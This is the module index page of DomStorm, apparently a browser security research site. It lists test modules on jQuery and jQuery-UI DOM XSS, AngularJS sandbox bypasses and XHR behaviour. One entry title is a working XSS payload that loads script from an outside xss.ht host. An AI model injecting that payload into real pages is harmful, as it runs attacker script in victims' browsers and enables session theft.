Toggle navigation
DomStorm
Search
Create Module
Modules
All Modules
Helper Modules
Top Modules
Docs
Creating Test Harness Module
Creating a Enumeration Module
ECMAScript 5.1
Document Object Model
Mozilla Developer Network Docs
XMLHttpRequest
CORS
HTTP / 1.1 - RFC 2616
Browser Security Handbook
HTTP State Management Mechanism
GitHub
Login
Modules
Hooking Storage Objects
jQuery Versions Vulnerable to Selector DOM XSS via # aka Selector IDs.
Properties of LocalStorage
Knockout JS libraries vulnerable to data-bind injection
testing no-op
jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR')
jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR')
Element Node Setters
Number Properties exposed by the Window Object?
Direct references to Window objects
Can Do Not Track be bypassed using XHR ?
TestHarness: XMLHttpRequest: setRequestHeader() name argument checks
Location unforgeable - Test Harness
jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR')
List of constructors that refer to window w/o parenthesis
Test XSS for jQuery
jQuery-UI XSS via .dialog() method's "title" argument [CVE-2010-5312]
Does Iframe sandbox execute script inside child iframe?
extended test for jquery selector xss
123
jQuery Versions Vulnerable to Selector DOM XSS via # aka Selector IDs. (2)
jQuery Migrate DOM XSS $(".<XSS>") [Class selector] (new)
Test
jQuery Migrate DOM XSS $(".<XSS>") [Class selector]
"><script src=https://xs90.xss.ht></script>
XSS vectors without user interaction
Attribute Separators
test
Geolocation Spoof
Jquery ID selector + location.hash.slice(1)
chuang yu dun
List of all jQuery versions vulnerable to the Selector DOM XSS. (http://ma.la/jquery_xss/)
test
final
Can Cookie Setter be Hooked?
Jquery attribute equals selector + location.hash.slice(1)
https://passport.informatica.com/js/jquery.js
jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR')
123
test
SecurityPolicyViolationEvent
Testing jQuery 3.1
Allowed Request Headers by XHR
Check document.domain
jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR')
jQuery Migrate DOM XSS $("#<XSS>") [id selector]
test
Global event handlers
Location hash (aka. fragment) spills into data URI content
jquery 1.8.1
TestHarness: Allowed Request Headers by XHR
s
Geolocation Overriding
jQuery Versions Vulnerable to Selector DOM XSS via # aka Selector IDs.
sdf
jQuery-UI XSS via .dialog() method's "closeText" argument
jQuery UI .dialog() closeText property DOM XSS Sink.
https://passport.informatica.com/js/jquery.js
2132
123
Configurability of Location Properties
Can Navigator.UserAgent Be Spoofed?
Jquery ID selector + location.hash
chuang yu dun
jQuery-UI XSS via .dialog() method
jQuery Selectors Vulnerable to XSS
AngularJS Sandbox Bypasses
jQuery-UI XSS via .dialog() method's "closeText" argument (short version)
HTTP Methods Supported by XHR
List of properties that doesn't need parenthesis
Getters & Setters for Element.prototype
jQuery Migrate DOM XSS $("a[href='<XSS>']") [Attribute equals selector]
TestHarness: Using Assertions in DomStorm
Updated jquery XSS attack
test
jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR')
Jquery class selector + hash.slice(1)
jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR')
Jquery a[] xss
Valid attribute separators
Document Setters
Check document.domain
angry jquery
proxy cookie
Run domato fuzzer 1000000 times
JQuery XSS test